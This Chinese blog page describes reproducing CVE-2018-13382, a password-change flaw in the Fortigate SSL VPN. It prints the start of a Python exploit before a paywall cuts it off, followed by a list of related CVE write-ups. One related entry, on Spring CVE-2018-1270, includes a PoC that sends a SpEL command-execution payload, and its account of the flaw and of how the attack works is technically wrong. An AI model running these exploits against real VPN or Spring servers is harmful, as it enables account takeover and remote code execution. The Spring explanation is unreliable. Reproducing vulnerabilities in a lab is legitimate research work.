CVE-2018-13382 环境搭建+漏洞复现

最新推荐文章于 2025-04-18 15:58:00 发布
最新推荐文章于 2025-04-18 15:58:00 发布
阅读量1.7k 收藏 1
点赞数 4
分类专栏: 漏洞复现 网安 文章标签: 安全 安全漏洞 路由器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42442326/article/details/119237325
版权

CVE-2018-13382 环境搭建+漏洞复现在这里插入图片描述

一.环境搭建

因为该漏洞和 CVE-2018-13379 所需要的环境是相同的,均处于Fortigate路由器的SSL VPN登录界面,所以环境搭建步骤就不再赘述了,详情见我的另一篇文章
CVE-2018-13379 环境搭建+漏洞复现

二.漏洞复现

CVE-2018-13382-exp (来源为github上的某位大佬,链接找不到了,这里附上源码)
所需python环境 3版本即可
import requests, optparse, sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
from user_agent import generate_user_agent
bold=True

userAgent=generate_user_agent()
username=""
newpassword=""
ip=""

def setColor(message, bold=False, color=None, onColor=None):
	from termcolor import colored, cprint
	retVal = colored(message, color=color, on_color=onColor, attrs=("bold",))
	return retVal

def checkIP(ip):
	try:
		url = "https://"+ip+"/remote/login?lang=en"
		headers = {
   "User-Agent": userAgent, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
最低0.47元/天 解锁文章
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 884
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600)
qq_51577576的博客
02-18 862
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
log4j2漏洞原理和漏洞环境搭建复现
dreamthe的博客
03-03 1万+
背景 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。 log4j3远程代码执行漏洞主要由于存在JN
Log4j远程代码执行漏洞环境搭建复现
m0_71263989的博客
02-20 1997
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4j,Log4j2 在性能、可靠性和灵活性方面都有显著的改进。
二月公开赛 宝塔搭建Web-ssrfme环境以及漏洞复现
最新发布
2301_78209684的博客
04-18 849
分析查看代码发现正则过滤了file,dict,源地址,localhost,发现如果存在info这个参数就会打印phpinfo,打印phpinfo可能会有一些对我们有用的信息。6379这个端口明显的redis服务的报错,说明该主机上还运行着redis服务那么我们试试redis的未授权访问攻击。可以看到在172.17.0.2上还有一台主机,并且上面还运行着http服务,那么我们可以尝试扫描一下这台主机的端口。抓包发送到intruder模块,从1-255开始扫。成功找到内网ip:172.17.0.3:80。
CVE-2018-8961复现
^_^
02-05 3801
libming的UAF漏洞复现
CVE-2018-8715(AppWeb认证绕过漏洞)
weixin_51387754的博客
10-26 1023
漏洞简介 漏洞编号:CVE-2018-8715 影响版本:7.0.3之前的版本 https://www.cvedetails.com/cve/CVE-2018-8715/ 漏洞产生原因: AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 form 表单认证 其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为nul
CVE-2018-1058简介
HighGO
04-04 1408
CVE-2018-1058描述了一个用户在不同模式下创建的一些名字很像的对象,是怎么改变其他用户的查询行为而且导致意料之外或者有害的行为的。它主要描述了这个问题以及在PostgreSQL中减轻这些问题的影响的办法。 什么是CVE-2018-1058? PostgreSQL7.3版本之后,默认情况下,当一个用户创建一个数据库时,PostgreSQL会创建一个叫做public的模式。默认情况下,所...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
Drupal 远程代码执行漏洞复现CVE-2018-7602)
Tauil的博客
08-08 1105
使用parse_str,并存入options,还需要通过其他步骤来触发漏洞。的输入来处理请(GET,POST,COOKIE,REQUEST)中数据。建立vulhub/drupal/CVE-2018-7602/环境。访问http://靶机IP/shell.php即可看到新建的网页。使用以下poc.py,与官网不同的是强制定义命令为。对CVE-2018-7600漏洞的补丁通过过滤带有。会导致输入错误等等原因,所以进行了一点修改。中的URL进行URL编码,当对URL中的。形式的请求,发起请求需要对。...
CVE-2018-4990 漏洞详情分析
weixin_34336526的博客
05-24 306
测试版本:AcroRdrDC1700920044_en_US 漏洞模块: Escript.api 漏洞函数 修复函数 问题分析 拷贝对象的时候把DWORD类型的对象地址作为BYTE类型进行了拷贝,堆对象拷贝溢出漏洞。对象偏移在0x50的地方,也就是错误的位置。 Javascript里面喷射的对象代码。 修复方案 定位到问题很好修复。 ROP技术 使用EScript.ap...
CVE-2018-8174漏洞获取shell复现
永远是少年
06-13 1379
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-8174漏洞获取shell复现。 一、CVE-2018-8174漏洞简介 二、利用漏洞生成网页 三、效果检验
CVE-2018-8174漏洞复现及内网渗透攻击
Waldocsdn的博客
03-12 3145
文章目录说明CVE-2018-8174漏洞简介Persistence后门环境搭建拓扑图Win server 2008 对Windows 7开启1433端口内网攻击过程1号机获得2号机的权限利用CVE-2018-8174漏洞获取2号机(Windows 7)权限,添加攻击者用户添加超级隐藏管理员账户使用vbs脚本上传SQLTOOLS.exe从Windows 7进攻Windows server 2008...
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)环境搭建
aweiweiweiei1的博客
07-17 640
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)搭建的教程: https://www.cnblogs.com/backlion/p/14055278.html
Fortinet FortiNAC RCE漏洞复现(CVE-2022-39952)
0xSec
05-17 2382
FortiNAC keyUpload 脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。
(环境搭建+复现)Apache CVE-2021-41773 && CVE-2021-42013系列漏洞复现
daxi0ng的博客
10-11 2046
0x00 简介 Apache HTTP Server(HTTPd)是Apache软件基金会的一个开放源代码的网页服务器。 0x01 漏洞概述 Apache HTTP Server目录遍历漏洞CVE-2021-41773 影响版本:Apache HTTP Server 2.4.49 该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,攻击者利用该漏洞在未授权的情况下,访问服务器未在httpd配置文件中标记为拒绝请求的文...
spring(CVE-2018-1273)远程代码执行漏洞复现
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
环境搭建+复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞
热门推荐
daxi0ng的博客
12-10 2万+
0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 0x01 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2.x <= 2.15.0-rc1 0x02环境搭建 1、创建一个新的maven项目,并导入Log4j的依赖包 <depe...
CVE-2022-40684 Fortinet多个产品身份验证绕过漏洞复现
热爱学习,喜欢折腾!
10-16 1790
Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy 为网站和基于云的应用程序提供安全 Web 网关、安全功能、无与伦比的性能以及最佳用户体验。
spring-CVE-2018-1270漏洞复现
03-17
### Spring CVE-2018-1270 漏洞复现教程 #### 背景介绍 Spring Framework 是一个广泛使用的 Java 开发框架,提供了丰富的功能来简化企业级应用开发。然而,在某些版本中存在安全漏洞,可能导致远程代码执行 (RCE) 的风险。CVE-2018-1270 就是一个典型的例子,它存在于 `org.springframework.messaging` 包中的 `Http invoker request deserialization` 功能中。 该漏洞允许攻击者通过发送恶意序列化的 HTTP 请求数据包触发 RCE 攻击[^4]。 --- #### 影响范围 此漏洞影响以下版本: - **Spring Framework 5.0 到 5.0.4** - **Spring Framework 4.3 到 4.3.14** 不受影响的修复版本为: - **5.0.x 用户应升级至 5.0.5** - **4.3.x 用户应升级至 4.3.15** --- #### 漏洞原理 当应用程序启用了基于 XML 或 JSON 的反序列化机制时,如果未正确验证输入的数据,则可能被利用来进行任意代码执行。具体来说,`AbstractRemoteInvocationHandler` 类会尝试解析传入的消息并调用目标对象的方法。由于缺乏严格的类型检查,攻击者可以注入恶意 payload 来实现远程命令执行[^3]。 --- #### 复现环境搭建 为了重现此漏洞,通常需要准备如下工具和资源: 1. **Docker 容器**: 使用 vulhub 提供的标准镜像快速部署测试环境。 2. **POC 工具**: 编写或下载可用的 Proof of Concept (PoC) 脚本用于模拟攻击行为。 以下是具体的步骤说明: ##### 步骤一:安装 Docker 和 Compose 确保本地机器上已经安装好 Docker 及其扩展组件 docker-compose。 ##### 步骤二:拉取漏洞演示镜像 运行以下命令获取官方提供的漏洞实验场景: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/spring/CVE-2018-1270/ docker-compose up -d ``` 等待服务启动完成后访问地址确认正常工作状态。 ##### 步骤三:编写 PoC 测试脚本 下面展示了一个简单的 Python 实现方式作为参考案例之一: ```python import requests url = "http://localhost:8080/" payload = { 'exploit': '''T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')''' } try: response = requests.post(url, data=payload) print(response.text) except Exception as e: print(f"Error occurred: {e}") ``` 上述代码片段试图向服务器提交一段能够触碰文件 `/tmp/success` 的指令以证明控制权已被夺取成功与否可通过查看是否存在指定路径下的标记文件得知结果如何。 --- #### 验证效果 一旦完成以上操作流程之后再次登录容器内部检验预期成果是否达成即观察是否有新生成的目标文档出现表明整个过程顺利完成无误: ```bash docker-compose exec spring bash ls /tmp/ # 应能看到 success 文件 ``` --- #### 总结建议 针对此类高危级别的缺陷应当及时采取措施加以防范比如尽快迁移到最新稳定发行版或者关闭不必要的网络接口减少暴露面从而降低遭受潜在威胁的可能性同时也要定期审查第三方依赖库的安全公告以便第一时间响应相应更新通知。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值